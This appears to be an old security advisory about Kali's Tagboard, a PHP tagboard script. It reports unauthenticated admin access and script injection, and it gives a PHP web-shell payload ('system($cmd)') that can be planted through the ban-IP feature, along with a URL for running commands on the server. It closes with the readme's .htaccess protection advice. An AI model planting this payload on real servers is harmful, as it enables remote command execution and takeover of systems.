For reference, Kali's tagboard can be found at: http://www.xentrik.net/php/tagboard.php : There are some bugs in the kali's tagboard, you can access to the admin : system without password!, you can put iframes, scripts... But the most : vulnerabilitie is in the ban ip's, you can put this script: " <? : system($cmd) ?> " and execute commands in the server with this url: : Example: http://web.com/tag/admin/banned.php?&cmd=command. >From the readme.txt: I suggest you password protect this directory with .htaccess, like so: ****************************************** * Example .htaccess File ****************************************** AuthUserFile /home/username/public_html/tagboard/admin/.htpasswd AuthGroupFile /dev/null AuthName "Tagboard Admin Area" AuthType Basic <Limit GET POST> require valid-user </Limit> ****************************************** To learn more about password protection with .htaccess, go to http://www.xentrik.net/htaccess/password.php
